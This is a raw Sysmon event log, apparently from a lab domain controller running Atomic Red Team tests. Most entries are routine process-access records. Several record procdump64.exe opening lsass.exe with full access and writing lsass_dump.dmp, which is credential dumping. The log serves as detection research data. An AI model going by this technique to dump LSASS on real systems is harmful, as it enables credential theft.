15:52:57.995{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005021Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.995{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005020Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.995{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005019Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.995{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005018Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.995{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005017Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.995{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005016Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.995{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005015Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.995{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005014Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.995{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CDA-5FA1-0301-000000008801}2652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005013Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:57.995{D28789B6-7CD9-5FA1-0201-000000008801}11643032C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{D28789B6-7CDA-5FA1-0301-000000008801}2652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005012Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.000{D28789B6-7CDA-5FA1-0301-000000008801}2652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESE6D1.tmp" "c:\Users\Administrator\AppData\Local\Temp\rnjnhxos\CSCC3B616732D954FB2B467E634BB1B22DD.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CD8-5FA1-59E7-0A0000000000}0xae7590HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{D28789B6-7CD9-5FA1-0201-000000008801}1164C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\rnjnhxos\rnjnhxos.cmdline" 10341000x80000000000000005436Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.544{D28789B6-7CDB-5FA1-1C01-000000008801}15564032C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005435Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.450{D28789B6-7CDB-5FA1-1D01-000000008801}39403500C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\SYSTEM32\dbgcore.DLL+15a38|C:\Windows\SYSTEM32\dbgcore.DLL+e3f5|C:\Windows\SYSTEM32\dbgcore.DLL+b027|C:\Windows\SYSTEM32\dbgcore.DLL+5db1|C:\Windows\SYSTEM32\dbgcore.DLL+67d3|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+13110|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+12b45|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+12a65|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+12722|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005434Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.450{D28789B6-7CDB-5FA1-1D01-000000008801}3940C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exeC:\Windows\Temp\lsass_dump.dmp2020-11-03 15:52:59.450 10341000x80000000000000005433Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.450{D28789B6-7CDB-5FA1-1D01-000000008801}39404080C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+7f7b|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000005432Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localAlert,Sysinternals Tool UsedSetValue2020-11-03 15:52:59.450{D28789B6-7CDB-5FA1-1D01-000000008801}3940C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exeHKU\S-1-5-21-635769498-3620204953-2298246598-500\SOFTWARE\Sysinternals\ProcDump\EulaAcceptedDWORD (0x00000001) 10341000x80000000000000005431Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.435{D28789B6-7CD8-5FA1-EF00-000000008801}39643644C:\Windows\system32\conhost.exe{D28789B6-7CDB-5FA1-1D01-000000008801}3940C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005430Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.435{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005429Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.435{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005428Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.435{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005427Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.435{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005426Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.435{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CDB-5FA1-1D01-000000008801}3940C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005425Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.435{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005424Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.435{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005423Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.435{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005422Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.435{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005421Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.435{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005420Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 